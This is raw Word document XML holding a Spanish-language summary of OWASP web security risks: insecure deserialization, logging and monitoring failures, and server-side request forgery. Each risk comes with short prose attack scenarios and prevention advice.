        <w:ind w:left="1440"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Deserialización </w:t>
      </w:r>
      <w:r w:rsidR="004C753C" w:rsidRPr="005A007D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nsegura</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>Ocurre cuando una app recibe objetos serializados hostiles. Entonces esto conduce a la ejecución remota del código. Los objetos serializados pueden ser reproducidos, manipulados o borrados por el atacante, realizar inyecciones o elevar privilegios.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005A007D" w:rsidRPr="005A007D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 1</w:t>
      </w:r>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se utiliza una serialización de objetos PHP para almacenar una cookie que contiene ID, rol, hash password y otros datos. El atacante modifica este objeto para elevar privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC1199" w14:textId="58CBE955" w:rsidR="00436253" w:rsidRPr="000340F3" w:rsidRDefault="00A165BF" w:rsidP="005A007D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A4DC5FB" wp14:editId="12C46B8D">
            <wp:extent cx="4104589" cy="5576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9320" cy="563682"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72C20B90" wp14:editId="5798F3EC">
            <wp:extent cx="4128515" cy="564048"/>
            <wp:effectExtent l="0" t="0" r="571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8800" cy="570918"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5F21A8" w14:textId="77777777" w:rsidR="00457D74" w:rsidRDefault="00457D74" w:rsidP="00882B11">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5870FA05" w14:textId="48DACFB5" w:rsidR="00882B11" w:rsidRDefault="00A165BF" w:rsidP="00882B11">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436253">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Prevención</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26508680" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="00436253" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00A165BF" w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">o aceptar objetos serializados de fuentes no confiables </w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o u</w:t>
      </w:r>
      <w:r w:rsidR="00A165BF" w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tilizar medios de serialización que solo permitan tipos de datos primitivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE7109C" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="00436253" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>irmas digitales para objetos serializados</w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640DC0BB" w14:textId="3F4A4287" w:rsidR="00B50F62" w:rsidRPr="00882B11" w:rsidRDefault="00436253" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">egistrar y monitorear las conexiones a red entrantes y salientes vinculadas a deserialización </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949F9DA" w14:textId="77777777" w:rsidR="00436253" w:rsidRPr="00436253" w:rsidRDefault="00436253" w:rsidP="00436253">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA7BC9E" w14:textId="79A325B7" w:rsidR="00B50F62" w:rsidRPr="00882B11" w:rsidRDefault="00B50F62" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A09 – Fallas en el </w:t>
      </w:r>
      <w:r w:rsidR="00436253" w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">egistro y </w:t>
      </w:r>
      <w:r w:rsidR="00436253" w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>onitoreo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FBEED1" w14:textId="6C9C1842" w:rsidR="00B50F62" w:rsidRPr="00882B11" w:rsidRDefault="00882B11" w:rsidP="00882B11">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Junto con la</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> falta o integración inefectiva de respuesta de </w:t>
      </w:r>
      <w:r w:rsidR="00694B2A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>incidentes</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> permiten a los atacantes persistir ataques, pivotear a mas sistemas y manipular, extraer o destruir datos. </w:t>
      </w:r>
      <w:r w:rsidR="00B50F62">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B50F62">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 1</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el </w:t>
      </w:r>
      <w:r w:rsidR="00436253" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>código</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> abierto de un foro es operado por un equipo que fue hackeado utilizando una falla en un software. Los atacantes elimina</w:t>
      </w:r>
      <w:r w:rsidR="00436253" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el c</w:t>
      </w:r>
      <w:r w:rsidR="00436253" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>digo fuente interno que contiene la próxima versión, y todos los contenidos del foro. La falta de monitoreo produjo esto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F8867" w14:textId="53401B03" w:rsidR="00932F5F" w:rsidRPr="00882B11" w:rsidRDefault="00882B11" w:rsidP="00882B11">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 2</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se escanean usuarios utilizando password por defecto, pudiendo controlar todas las cuentas</w:t>
      </w:r>
      <w:r w:rsidR="00436253" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B50F62">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 3</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> No se detecta una brecha por falta de monitoreo y registro. Un </w:t>
      </w:r>
      <w:r w:rsidR="00436253" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tercero</w:t>
      </w:r>
      <w:r w:rsidR="00B50F62" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> avisa de esta problemática y se detecta que se modificaron miles de registros</w:t>
      </w:r>
      <w:r w:rsidR="00932F5F" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Un posterior análisis arroj</w:t>
      </w:r>
      <w:r w:rsidR="00436253" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidR="00932F5F" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que los desarrolladores del sitio web no encontraron fallas significativas.</w:t>
      </w:r>
      <w:r w:rsidR="00932F5F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00932F5F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 4</w:t>
      </w:r>
      <w:r w:rsidR="00932F5F" w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00932F5F" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Una aerolínea sufrió una pérdida de datos ya que un atacante explot</w:t>
      </w:r>
      <w:r w:rsidR="00436253" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidR="00932F5F" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> una vulnerabilidad en una </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00932F5F" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00932F5F" w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de pago, obteniendo registros de pagos de usuario. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20668357" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="00436253" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prevención</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58483C64" w14:textId="77777777" w:rsidR="00882B11" w:rsidRPr="00882B11" w:rsidRDefault="00436253" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00932F5F" w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e debe registrar con el contexto de usuario ante cualquier error de inicio de sesión, control de acceso y validación de entrada. Esto permite identificar cuentas sospechosas o maliciosas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E034318" w14:textId="77777777" w:rsidR="00882B11" w:rsidRPr="00882B11" w:rsidRDefault="00932F5F" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Auditar transacción de alto impacto, además deben poseer una taza alta de controles de integridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B81AFC" w14:textId="76E2988D" w:rsidR="00436253" w:rsidRPr="00882B11" w:rsidRDefault="00932F5F" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Monitorear continuamente y alertas efectivas para detectar actividades sospechosas. Es</w:t>
      </w:r>
      <w:r w:rsidR="003922B7" w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>to ayuda a una respuesta efectiv</w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a y veloz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7575D5" w14:textId="29B1D2B0" w:rsidR="00882B11" w:rsidRPr="00882B11" w:rsidRDefault="00882B11" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A60B873" w14:textId="5DA5D691" w:rsidR="003922B7" w:rsidRPr="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A10 – Falsificación de </w:t>
      </w:r>
      <w:r w:rsidR="00736A26" w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">olicitudes del </w:t>
      </w:r>
      <w:r w:rsidR="00736A26" w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ado del </w:t>
      </w:r>
      <w:r w:rsidR="00736A26" w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ervidor (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B90F63B" w14:textId="15B7231D" w:rsidR="003922B7" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Esto ocurre cuando una aplicación web no está validando la URL donde obtiene el recurso remoto proporcionado por el usuario. Esto permite que el atacante coaccione a la aplicación para que env</w:t>
      </w:r>
      <w:r w:rsidR="00736A26">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>íe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> una solicitud falsificada a un destino inesperado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5830580D" w14:textId="139AEF8A" w:rsidR="00882B11" w:rsidRDefault="00882B11" w:rsidP="00882B11">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escaneo de puertos de servidores externos. Los atacantes pueden determinar si un puerto esta abierto o no dependiendo del tiempo transcurrido para conectar o rechazar las conexiones o mismo de los resultados de la conexión</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B6E8D3" w14:textId="173C38C3" w:rsidR="00882B11" w:rsidRPr="00882B11" w:rsidRDefault="00882B11" w:rsidP="00882B11">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ejemplo 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exposición de datos sensibles. Los atacantes pueden acceder a archivos locales como servicios internos para obtener información confidencial. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F04721B" w14:textId="77777777" w:rsidR="00882B11" w:rsidRPr="00882B11" w:rsidRDefault="00C77E42" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prevención</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F12A82C" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sanitice y valide todos los datos proporcionados por el cliente</w:t>
      </w:r>
    </w:p>
